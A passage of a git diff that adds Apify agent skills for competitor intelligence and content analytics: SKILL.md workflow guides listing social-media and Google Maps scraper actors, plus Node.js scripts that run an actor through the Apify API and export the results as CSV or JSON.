+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ const jsonStr = JSON.stringify(value);
+ displayValue = jsonStr.length > 100 ? jsonStr.slice(0, 100) + '...' : jsonStr;
+ }
+
+ console.log(` ${key}: ${displayValue}`);
+ }
+ }
+
+ console.log(`\n${'='.repeat(60)}`);
+ if (total > 5) {
+ console.log(`Showing 5 of ${total} results.`);
+ }
+ console.log(`Full data available at: https://console.apify.com/storage/datasets/${datasetId}`);
+ console.log('='.repeat(60));
+}
+
+// Report summary of downloaded data
+function reportSummary(outputPath, format) {
+ const stats = statSync(outputPath);
+ const size = stats.size;
+
+ let count;
+ try {
+ const content = require('fs').readFileSync(outputPath, 'utf-8');
+ if (format === 'json') {
+ const data = JSON.parse(content);
+ count = Array.isArray(data) ? data.length : 1;
+ } else {
+ // CSV - count lines minus header
+ const lines = content.split('\n').filter((line) => line.trim());
+ count = Math.max(0, lines.length - 1);
+ }
+ } catch {
+ count = 'unknown';
+ }
+
+ console.log(`Records: ${count}`);
+ console.log(`Size: ${size.toLocaleString()} bytes`);
+}
+
+// Helper: sleep for ms
+function sleep(ms) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// Main function
+async function main() {
+ // Parse args first so --help works without token
+ const args = parseCliArgs();
+
+ // Check for APIFY_TOKEN
+ const token = process.env.APIFY_TOKEN;
+ if (!token) {
+ console.error('Error: APIFY_TOKEN not found in .env file');
+ console.error('');
+ console.error('Add your token to .env file:');
+ console.error(' APIFY_TOKEN=your_token_here');
+ console.error('');
+ console.error('Get your token: https://console.apify.com/account/integrations');
+ process.exit(1);
+ }
+
+ // Start the actor run
+ console.log(`Starting actor: ${args.actor}`);
+ const { runId, datasetId } = await startActor(token, args.actor, args.input);
+ console.log(`Run ID: ${runId}`);
+ console.log(`Dataset ID: ${datasetId}`);
+
+ // Poll for completion
+ const status = await pollUntilComplete(token, runId, args.timeout, args.pollInterval);
+
+ if (status !== 'SUCCEEDED') {
+ console.error(`Error: Actor run ${status}`);
+ console.error(`Details: https://console.apify.com/actors/runs/${runId}`);
+ process.exit(1);
+ }
+
+ // Determine output mode
+ if (args.output) {
+ // File output mode
+ await downloadResults(token, datasetId, args.output, args.format);
+ reportSummary(args.output, args.format);
+ } else {
+ // Quick answer mode - display in chat
+ await displayQuickAnswer(token, datasetId);
+ }
+}
+
+main().catch((err) => {
+ console.error(`Error: ${err.message}`);
+ process.exit(1);
+});
diff --git a/web-app/public/skills/apify-competitor-intelligence/SKILL.md b/web-app/public/skills/apify-competitor-intelligence/SKILL.md
new file mode 100644
index 00000000..eb5bdc34
--- /dev/null
+++ b/web-app/public/skills/apify-competitor-intelligence/SKILL.md
@@ -0,0 +1,131 @@
+---
+name: apify-competitor-intelligence
+description: Analyze competitor strategies, content, pricing, ads, and market positioning across Google Maps, Booking.com, Facebook, Instagram, YouTube, and TikTok.
+---
+
+# Competitor Intelligence
+
+Analyze competitors using Apify Actors to extract data from multiple platforms.
+
+## Prerequisites
+(No need to check it upfront)
+
+- `.env` file with `APIFY_TOKEN`
+- Node.js 20.6+ (for native `--env-file` support)
+- `mcpc` CLI tool: `npm install -g @apify/mcpc`
+
+## Workflow
+
+Copy this checklist and track progress:
+
+```
+Task Progress:
+- [ ] Step 1: Identify competitor analysis type (select Actor)
+- [ ] Step 2: Fetch Actor schema via mcpc
+- [ ] Step 3: Ask user preferences (format, filename)
+- [ ] Step 4: Run the analysis script
+- [ ] Step 5: Summarize findings
+```
+
+### Step 1: Identify Competitor Analysis Type
+
+Select the appropriate Actor based on analysis needs:
+
+| User Need | Actor ID | Best For |
+|-----------|----------|----------|
+| Competitor business data | `compass/crawler-google-places` | Location analysis |
+| Competitor contact discovery | `poidata/google-maps-email-extractor` | Email extraction |
+| Feature benchmarking | `compass/google-maps-extractor` | Detailed business data |
+| Competitor review analysis | `compass/Google-Maps-Reviews-Scraper` | Review comparison |
+| Hotel competitor data | `voyager/booking-scraper` | Hotel benchmarking |
+| Hotel review comparison | `voyager/booking-reviews-scraper` | Review analysis |
+| Competitor ad strategies | `apify/facebook-ads-scraper` | Ad creative analysis |
+| Competitor page metrics | `apify/facebook-pages-scraper` | Page performance |
+| Competitor content analysis | `apify/facebook-posts-scraper` | Post strategies |
+| Competitor reels performance | `apify/facebook-reels-scraper` | Reels analysis |
+| Competitor audience analysis | `apify/facebook-comments-scraper` | Comment sentiment |
+| Competitor event monitoring | `apify/facebook-events-scraper` | Event tracking |
+| Competitor audience overlap | `apify/facebook-followers-following-scraper` | Follower analysis |
+| Competitor review benchmarking | `apify/facebook-reviews-scraper` | Review comparison |
+| Competitor ad monitoring | `apify/facebook-search-scraper` | Ad discovery |
+| Competitor profile metrics | `apify/instagram-profile-scraper` | Profile analysis |
+| Competitor content monitoring | `apify/instagram-post-scraper` | Post tracking |
+| Competitor engagement analysis | `apify/instagram-comment-scraper` | Comment analysis |
+| Competitor reel performance | `apify/instagram-reel-scraper` | Reel metrics |
+| Competitor growth tracking | `apify/instagram-followers-count-scraper` | Follower tracking |
+| Comprehensive competitor data | `apify/instagram-scraper` | Full analysis |
+| API-based competitor analysis | `apify/instagram-api-scraper` | API access |
+| Competitor video analysis | `streamers/youtube-scraper` | Video metrics |
+| Competitor sentiment analysis | `streamers/youtube-comments-scraper` | Comment sentiment |
+| Competitor channel metrics | `streamers/youtube-channel-scraper` | Channel analysis |
+| TikTok competitor analysis | `clockworks/tiktok-scraper` | TikTok data |
+| Competitor video strategies | `clockworks/tiktok-video-scraper` | Video analysis |
+| Competitor TikTok profiles | `clockworks/tiktok-profile-scraper` | Profile data |
+
+### Step 2: Fetch Actor Schema
+
+Fetch the Actor's input schema and details dynamically using mcpc:
+
+```bash
+export $(grep APIFY_TOKEN .env | xargs) && mcpc --json mcp.apify.com --header "Authorization: Bearer $APIFY_TOKEN" tools-call fetch-actor-details actor:="ACTOR_ID" | jq -r ".content"
+```
+
+Replace `ACTOR_ID` with the selected Actor (e.g., `compass/crawler-google-places`).
+
+This returns:
+- Actor description and README
+- Required and optional input parameters
+- Output fields (if available)
+
+### Step 3: Ask User Preferences
+
+Before running, ask:
+1. **Output format**:
+ - **Quick answer** - Display top few results in chat (no file saved)
+ - **CSV** - Full export with all fields
+ - **JSON** - Full export in JSON format
+2. **Number of results**: Based on character of use case
+
+### Step 4: Run the Script
+
+**Quick answer (display in chat, no file):**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT'
+```
+
+**CSV:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.csv \
+ --format csv
+```
+
+**JSON:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.json \
+ --format json
+```
+
+### Step 5: Summarize Findings
+
+After completion, report:
+- Number of competitors analyzed
+- File location and name
+- Key competitive insights
+- Suggested next steps (deeper analysis, benchmarking)
+
+
+## Error Handling
+
+`APIFY_TOKEN not found` - Ask user to create `.env` with `APIFY_TOKEN=your_token`
+`mcpc not found` - Ask user to install `npm install -g @apify/mcpc`
+`Actor not found` - Check Actor ID spelling
+`Run FAILED` - Ask user to check Apify console link in error output
+`Timeout` - Reduce input size or increase `--timeout`
diff --git a/web-app/public/skills/apify-competitor-intelligence/reference/scripts/run_actor.js b/web-app/public/skills/apify-competitor-intelligence/reference/scripts/run_actor.js
new file mode 100644
index 00000000..6f373dd1
--- /dev/null
+++ b/web-app/public/skills/apify-competitor-intelligence/reference/scripts/run_actor.js
@@ -0,0 +1,363 @@
+#!/usr/bin/env node
+/**
+ * Apify Actor Runner - Runs Apify actors and exports results.
+ *
+ * Usage:
+ * # Quick answer (display in chat, no file saved)
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+ *
+ * # Export to file
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}' --output leads.csv --format csv
+ */
+
+import { parseArgs } from 'node:util';
+import { writeFileSync, statSync } from 'node:fs';
+
+// User-Agent for tracking skill usage in Apify analytics
+const USER_AGENT = 'apify-agent-skills/apify-competitor-intelligence-1.0.1';
+
+// Parse command-line arguments
+function parseCliArgs() {
+ const options = {
+ actor: { type: 'string', short: 'a' },
+ input: { type: 'string', short: 'i' },
+ output: { type: 'string', short: 'o' },
+ format: { type: 'string', short: 'f', default: 'csv' },
+ timeout: { type: 'string', short: 't', default: '600' },
+ 'poll-interval': { type: 'string', default: '5' },
+ help: { type: 'boolean', short: 'h' },
+ };
+
+ const { values } = parseArgs({ options, allowPositionals: false });
+
+ if (values.help) {
+ printHelp();
+ process.exit(0);
+ }
+
+ if (!values.actor) {
+ console.error('Error: --actor is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ if (!values.input) {
+ console.error('Error: --input is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ return {
+ actor: values.actor,
+ input: values.input,
+ output: values.output,
+ format: values.format || 'csv',
+ timeout: parseInt(values.timeout, 10),
+ pollInterval: parseInt(values['poll-interval'], 10),
+ };
+}
+
+function printHelp() {
+ console.log(`
+Apify Actor Runner - Run Apify actors and export results
+
+Usage:
+ node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+
+Options:
+ --actor, -a Actor ID (e.g., compass/crawler-google-places) [required]
+ --input, -i Actor input as JSON string [required]
+ --output, -o Output file path (optional - if not provided, displays quick answer)
+ --format, -f Output format: csv, json (default: csv)
+ --timeout, -t Max wait time in seconds (default: 600)
+ --poll-interval Seconds between status checks (default: 5)
+ --help, -h Show this help message
+
+Output Formats:
+ JSON (all data) --output file.json --format json
+ CSV (all data) --output file.csv --format csv
+ Quick answer (no --output) - displays top 5 in chat
+
+Examples:
+ # Quick answer - display top 5 in chat
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}'
+
+ # Export all data to CSV
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}' \\
+ --output leads.csv --format csv
+`);
+}
+
+// Start an actor run and return { runId, datasetId }
+async function startActor(token, actorId, inputJson) {
+ // Convert "author/actor" format to "author~actor" for API compatibility
+ const apiActorId = actorId.replace('/', '~');
+ const url = `https://api.apify.com/v2/acts/${apiActorId}/runs?token=${encodeURIComponent(token)}`;
+
+ let data;
+ try {
+ data = JSON.parse(inputJson);
+ } catch (e) {
+ console.error(`Error: Invalid JSON input: ${e.message}`);
+ process.exit(1);
+ }
+
+ const response = await fetch(url, {
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'User-Agent': `${USER_AGENT}/start_actor`,
+ },
+ body: JSON.stringify(data),
+ });
+
+ if (response.status === 404) {
+ console.error(`Error: Actor '${actorId}' not found`);
+ process.exit(1);
+ }
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: API request failed (${response.status}): ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ return {
+ runId: result.data.id,
+ datasetId: result.data.defaultDatasetId,
+ };
+}
+
+// Poll run status until complete or timeout
+async function pollUntilComplete(token, runId, timeout, interval) {
+ const url = `https://api.apify.com/v2/actor-runs/${runId}?token=${encodeURIComponent(token)}`;
+ const startTime = Date.now();
+ let lastStatus = null;
+
+ while (true) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to get run status: ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ const status = result.data.status;
+
+ // Only print when status changes
+ if (status !== lastStatus) {
+ console.log(`Status: ${status}`);
+ lastStatus = status;
+ }
+
+ if (['SUCCEEDED', 'FAILED', 'ABORTED', 'TIMED-OUT'].includes(status)) {
+ return status;
+ }
+
+ const elapsed = (Date.now() - startTime) / 1000;
+ if (elapsed > timeout) {
+ console.error(`Warning: Timeout after ${timeout}s, actor still running`);
+ return 'TIMED-OUT';
+ }
+
+ await sleep(interval * 1000);
+ }
+}
+
+// Download dataset items
+async function downloadResults(token, datasetId, outputPath, format) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/download_${format}`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+
+ if (format === 'json') {
+ writeFileSync(outputPath, JSON.stringify(data, null, 2));
+ } else {
+ // CSV output
+ if (data.length > 0) {
+ const fieldnames = Object.keys(data[0]);
+ const csvLines = [fieldnames.join(',')];
+
+ for (const row of data) {
+ const values = fieldnames.map((key) => {
+ let value = row[key];
+
+ // Truncate long text fields
+ if (typeof value === 'string' && value.length > 200) {
+ value = value.slice(0, 200) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ value = JSON.stringify(value) || '';
+ }
+
+ // CSV escape: wrap in quotes if contains comma, quote, or newline
+ if (value === null || value === undefined) {
+ return '';
+ }
+ const strValue = String(value);
+ if (strValue.includes(',') || strValue.includes('"') || strValue.includes('\n')) {
+ return `"${strValue.replace(/"/g, '""')}"`;
+ }
+ return strValue;
+ });
+ csvLines.push(values.join(','));
+ }
+
+ writeFileSync(outputPath, csvLines.join('\n'));
+ } else {
+ writeFileSync(outputPath, '');
+ }
+ }
+
+ console.log(`Saved to: ${outputPath}`);
+}
+
+// Display top 5 results in chat format
+async function displayQuickAnswer(token, datasetId) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/quick_answer`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+ const total = data.length;
+
+ if (total === 0) {
+ console.log('\nNo results found.');
+ return;
+ }
+
+ // Display top 5
+ console.log(`\n${'='.repeat(60)}`);
+ console.log(`TOP 5 RESULTS (of ${total} total)`);
+ console.log('='.repeat(60));
+
+ for (let i = 0; i < Math.min(5, data.length); i++) {
+ const item = data[i];
+ console.log(`\n--- Result ${i + 1} ---`);
+
+ for (const [key, value] of Object.entries(item)) {
+ let displayValue = value;
+
+ // Truncate long values
+ if (typeof value === 'string' && value.length > 100) {
+ displayValue = value.slice(0, 100) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ const jsonStr = JSON.stringify(value);
+ displayValue = jsonStr.length > 100 ? jsonStr.slice(0, 100) + '...' : jsonStr;
+ }
+
+ console.log(` ${key}: ${displayValue}`);
+ }
+ }
+
+ console.log(`\n${'='.repeat(60)}`);
+ if (total > 5) {
+ console.log(`Showing 5 of ${total} results.`);
+ }
+ console.log(`Full data available at: https://console.apify.com/storage/datasets/${datasetId}`);
+ console.log('='.repeat(60));
+}
+
+// Report summary of downloaded data
+function reportSummary(outputPath, format) {
+ const stats = statSync(outputPath);
+ const size = stats.size;
+
+ let count;
+ try {
+ const content = require('fs').readFileSync(outputPath, 'utf-8');
+ if (format === 'json') {
+ const data = JSON.parse(content);
+ count = Array.isArray(data) ? data.length : 1;
+ } else {
+ // CSV - count lines minus header
+ const lines = content.split('\n').filter((line) => line.trim());
+ count = Math.max(0, lines.length - 1);
+ }
+ } catch {
+ count = 'unknown';
+ }
+
+ console.log(`Records: ${count}`);
+ console.log(`Size: ${size.toLocaleString()} bytes`);
+}
+
+// Helper: sleep for ms
+function sleep(ms) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// Main function
+async function main() {
+ // Parse args first so --help works without token
+ const args = parseCliArgs();
+
+ // Check for APIFY_TOKEN
+ const token = process.env.APIFY_TOKEN;
+ if (!token) {
+ console.error('Error: APIFY_TOKEN not found in .env file');
+ console.error('');
+ console.error('Add your token to .env file:');
+ console.error(' APIFY_TOKEN=your_token_here');
+ console.error('');
+ console.error('Get your token: https://console.apify.com/account/integrations');
+ process.exit(1);
+ }
+
+ // Start the actor run
+ console.log(`Starting actor: ${args.actor}`);
+ const { runId, datasetId } = await startActor(token, args.actor, args.input);
+ console.log(`Run ID: ${runId}`);
+ console.log(`Dataset ID: ${datasetId}`);
+
+ // Poll for completion
+ const status = await pollUntilComplete(token, runId, args.timeout, args.pollInterval);
+
+ if (status !== 'SUCCEEDED') {
+ console.error(`Error: Actor run ${status}`);
+ console.error(`Details: https://console.apify.com/actors/runs/${runId}`);
+ process.exit(1);
+ }
+
+ // Determine output mode
+ if (args.output) {
+ // File output mode
+ await downloadResults(token, datasetId, args.output, args.format);
+ reportSummary(args.output, args.format);
+ } else {
+ // Quick answer mode - display in chat
+ await displayQuickAnswer(token, datasetId);
+ }
+}
+
+main().catch((err) => {
+ console.error(`Error: ${err.message}`);
+ process.exit(1);
+});
diff --git a/web-app/public/skills/apify-content-analytics/SKILL.md b/web-app/public/skills/apify-content-analytics/SKILL.md
new file mode 100644
index 00000000..021eeb5c
--- /dev/null
+++ b/web-app/public/skills/apify-content-analytics/SKILL.md
@@ -0,0 +1,120 @@
+---
+name: apify-content-analytics
+description: Track engagement metrics, measure campaign ROI, and analyze content performance across Instagram, Facebook, YouTube, and TikTok.
+---
+
+# Content Analytics
+
+Track and analyze content performance using Apify Actors to extract engagement metrics from multiple platforms.
+
+## Prerequisites
+(No need to check it upfront)
+
+- `.env` file with `APIFY_TOKEN`
+- Node.js 20.6+ (for native `--env-file` support)
+- `mcpc` CLI tool: `npm install -g @apify/mcpc`
+
+## Workflow
+
+Copy this checklist and track progress:
+
+```
+Task Progress:
+- [ ] Step 1: Identify content analytics type (select Actor)
+- [ ] Step 2: Fetch Actor schema via mcpc
+- [ ] Step 3: Ask user preferences (format, filename)
+- [ ] Step 4: Run the analytics script
+- [ ] Step 5: Summarize findings
+```
+
+### Step 1: Identify Content Analytics Type
+
+Select the appropriate Actor based on analytics needs:
+
+| User Need | Actor ID | Best For |
+|-----------|----------|----------|
+| Post engagement metrics | `apify/instagram-post-scraper` | Post performance |
+| Reel performance | `apify/instagram-reel-scraper` | Reel analytics |
+| Follower growth tracking | `apify/instagram-followers-count-scraper` | Growth metrics |
+| Comment engagement | `apify/instagram-comment-scraper` | Comment analysis |
+| Hashtag performance | `apify/instagram-hashtag-scraper` | Branded hashtags |
+| Mention tracking | `apify/instagram-tagged-scraper` | Tag tracking |
+| Comprehensive metrics | `apify/instagram-scraper` | Full data |
+| API-based analytics | `apify/instagram-api-scraper` | API access |
+| Facebook post performance | `apify/facebook-posts-scraper` | Post metrics |
+| Reaction analysis | `apify/facebook-likes-scraper` | Engagement types |
+| Facebook Reels metrics | `apify/facebook-reels-scraper` | Reels performance |
+| Ad performance tracking | `apify/facebook-ads-scraper` | Ad analytics |
+| Facebook comment analysis | `apify/facebook-comments-scraper` | Comment engagement |
+| Page performance audit | `apify/facebook-pages-scraper` | Page metrics |
+| YouTube video metrics | `streamers/youtube-scraper` | Video performance |
+| YouTube Shorts analytics | `streamers/youtube-shorts-scraper` | Shorts performance |
+| TikTok content metrics | `clockworks/tiktok-scraper` | TikTok analytics |
+
+### Step 2: Fetch Actor Schema
+
+Fetch the Actor's input schema and details dynamically using mcpc:
+
+```bash
+export $(grep APIFY_TOKEN .env | xargs) && mcpc --json mcp.apify.com --header "Authorization: Bearer $APIFY_TOKEN" tools-call fetch-actor-details actor:="ACTOR_ID" | jq -r ".content"
+```
+
+Replace `ACTOR_ID` with the selected Actor (e.g., `apify/instagram-post-scraper`).
+
+This returns:
+- Actor description and README
+- Required and optional input parameters
+- Output fields (if available)
+
+### Step 3: Ask User Preferences
+
+Before running, ask:
+1. **Output format**:
+ - **Quick answer** - Display top few results in chat (no file saved)
+ - **CSV** - Full export with all fields
+ - **JSON** - Full export in JSON format
+2. **Number of results**: Based on character of use case
+
+### Step 4: Run the Script
+
+**Quick answer (display in chat, no file):**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT'
+```
+
+**CSV:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.csv \
+ --format csv
+```
+
+**JSON:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.json \
+ --format json
+```
+
+### Step 5: Summarize Findings
+
+After completion, report:
+- Number of content pieces analyzed
+- File location and name
+- Key performance insights
+- Suggested next steps (deeper analysis, content optimization)
+
+
+## Error Handling
+
+`APIFY_TOKEN not found` - Ask user to create `.env` with `APIFY_TOKEN=your_token`
+`mcpc not found` - Ask user to install `npm install -g @apify/mcpc`
+`Actor not found` - Check Actor ID spelling
+`Run FAILED` - Ask user to check Apify console link in error output
+`Timeout` - Reduce input size or increase `--timeout`
diff --git a/web-app/public/skills/apify-content-analytics/reference/scripts/run_actor.js b/web-app/public/skills/apify-content-analytics/reference/scripts/run_actor.js
new file mode 100644
index 00000000..418bc07f
--- /dev/null
+++ b/web-app/public/skills/apify-content-analytics/reference/scripts/run_actor.js
@@ -0,0 +1,363 @@
+#!/usr/bin/env node
+/**
+ * Apify Actor Runner - Runs Apify actors and exports results.
+ *
+ * Usage:
+ * # Quick answer (display in chat, no file saved)
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+ *
+ * # Export to file
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}' --output leads.csv --format csv
+ */
+
+import { parseArgs } from 'node:util';
+import { writeFileSync, statSync } from 'node:fs';
+
+// User-Agent for tracking skill usage in Apify analytics
+const USER_AGENT = 'apify-agent-skills/apify-content-analytics-1.0.0';
+
+// Parse command-line arguments
+function parseCliArgs() {
+ const options = {
+ actor: { type: 'string', short: 'a' },
+ input: { type: 'string', short: 'i' },
+ output: { type: 'string', short: 'o' },
+ format: { type: 'string', short: 'f', default: 'csv' },
+ timeout: { type: 'string', short: 't', default: '600' },
+ 'poll-interval': { type: 'string', default: '5' },
+ help: { type: 'boolean', short: 'h' },
+ };
+
+ const { values } = parseArgs({ options, allowPositionals: false });
+
+ if (values.help) {
+ printHelp();
+ process.exit(0);
+ }
+
+ if (!values.actor) {
+ console.error('Error: --actor is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ if (!values.input) {
+ console.error('Error: --input is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ return {
+ actor: values.actor,
+ input: values.input,
+ output: values.output,
+ format: values.format || 'csv',
+ timeout: parseInt(values.timeout, 10),
+ pollInterval: parseInt(values['poll-interval'], 10),
+ };
+}
+
+function printHelp() {
+ console.log(`
+Apify Actor Runner - Run Apify actors and export results
+
+Usage:
+ node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+
+Options:
+ --actor, -a Actor ID (e.g., compass/crawler-google-places) [required]
+ --input, -i Actor input as JSON string [required]
+ --output, -o Output file path (optional - if not provided, displays quick answer)
+ --format, -f Output format: csv, json (default: csv)
+ --timeout, -t Max wait time in seconds (default: 600)
+ --poll-interval Seconds between status checks (default: 5)
+ --help, -h Show this help message
+
+Output Formats:
+ JSON (all data) --output file.json --format json
+ CSV (all data) --output file.csv --format csv
+ Quick answer (no --output) - displays top 5 in chat
+
+Examples:
+ # Quick answer - display top 5 in chat
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}'
+
+ # Export all data to CSV
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}' \\
+ --output leads.csv --format csv
+`);
+}
+
+// Start an actor run and return { runId, datasetId }
+async function startActor(token, actorId, inputJson) {
+ // Convert "author/actor" format to "author~actor" for API compatibility
+ const apiActorId = actorId.replace('/', '~');
+ const url = `https://api.apify.com/v2/acts/${apiActorId}/runs?token=${encodeURIComponent(token)}`;
+
+ let data;
+ try {
+ data = JSON.parse(inputJson);
+ } catch (e) {
+ console.error(`Error: Invalid JSON input: ${e.message}`);
+ process.exit(1);
+ }
+
+ const response = await fetch(url, {
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'User-Agent': `${USER_AGENT}/start_actor`,
+ },
+ body: JSON.stringify(data),
+ });
+
+ if (response.status === 404) {
+ console.error(`Error: Actor '${actorId}' not found`);
+ process.exit(1);
+ }
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: API request failed (${response.status}): ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ return {
+ runId: result.data.id,
+ datasetId: result.data.defaultDatasetId,
+ };
+}
+
+// Poll run status until complete or timeout
+async function pollUntilComplete(token, runId, timeout, interval) {
+ const url = `https://api.apify.com/v2/actor-runs/${runId}?token=${encodeURIComponent(token)}`;
+ const startTime = Date.now();
+ let lastStatus = null;
+
+ while (true) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to get run status: ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ const status = result.data.status;
+
+ // Only print when status changes
+ if (status !== lastStatus) {
+ console.log(`Status: ${status}`);
+ lastStatus = status;
+ }
+
+ if (['SUCCEEDED', 'FAILED', 'ABORTED', 'TIMED-OUT'].includes(status)) {
+ return status;
+ }
+
+ const elapsed = (Date.now() - startTime) / 1000;
+ if (elapsed > timeout) {
+ console.error(`Warning: Timeout after ${timeout}s, actor still running`);
+ return 'TIMED-OUT';
+ }
+
+ await sleep(interval * 1000);
+ }
+}
+
+// Download dataset items
+async function downloadResults(token, datasetId, outputPath, format) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/download_${format}`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+
+ if (format === 'json') {
+ writeFileSync(outputPath, JSON.stringify(data, null, 2));
+ } else {
+ // CSV output
+ if (data.length > 0) {
+ const fieldnames = Object.keys(data[0]);
+ const csvLines = [fieldnames.join(',')];
+
+ for (const row of data) {
+ const values = fieldnames.map((key) => {
+ let value = row[key];
+
+ // Truncate long text fields
+ if (typeof value === 'string' && value.length > 200) {
+ value = value.slice(0, 200) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ value = JSON.stringify(value) || '';
+ }
+
+ // CSV escape: wrap in quotes if contains comma, quote, or newline
+ if (value === null || value === undefined) {
+ return '';
+ }
+ const strValue = String(value);
+ if (strValue.includes(',') || strValue.includes('"') || strValue.includes('\n')) {
+ return `"${strValue.replace(/"/g, '""')}"`;
+ }
+ return strValue;
+ });
+ csvLines.push(values.join(','));
+ }
+
+ writeFileSync(outputPath, csvLines.join('\n'));
+ } else {
+ writeFileSync(outputPath, '');
+ }
+ }
+
+ console.log(`Saved to: ${outputPath}`);
+}
+
+// Display top 5 results in chat format
+async function displayQuickAnswer(token, datasetId) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/quick_answer`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+ const total = data.length;
+
+ if (total === 0) {
+ console.log('\nNo results found.');
+ return;
+ }
+
+ // Display top 5
+ console.log(`\n${'='.repeat(60)}`);
+ console.log(`TOP 5 RESULTS (of ${total} total)`);
+ console.log('='.repeat(60));
+
+ for (let i = 0; i < Math.min(5, data.length); i++) {
+ const item = data[i];
+ console.log(`\n--- Result ${i + 1} ---`);
+
+ for (const [key, value] of Object.entries(item)) {
+ let displayValue = value;
+
+ // Truncate long values
+ if (typeof value === 'string' && value.length > 100) {
+ displayValue = value.slice(0, 100) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ const jsonStr = JSON.stringify(value);
+ displayValue = jsonStr.length > 100 ? jsonStr.slice(0, 100) + '...' : jsonStr;
+ }
+
+ console.log(` ${key}: ${displayValue}`);
+ }
+ }
+
+ console.log(`\n${'='.repeat(60)}`);
+ if (total > 5) {
+ console.log(`Showing 5 of ${total} results.`);
+ }
+ console.log(`Full data available at: https://console.apify.com/storage/datasets/${datasetId}`);
+ console.log('='.repeat(60));
+}
+
+// Report summary of downloaded data
+function reportSummary(outputPath, format) {
+ const stats = statSync(outputPath);
+ const size = stats.size;
+
+ let count;
+ try {
+ const content = require('fs').readFileSync(outputPath, 'utf-8');
+ if (format === 'json') {
+ const data = JSON.parse(content);
+ count = Array.isArray(data) ? data.length : 1;
+ } else {
+ // CSV - count lines minus header
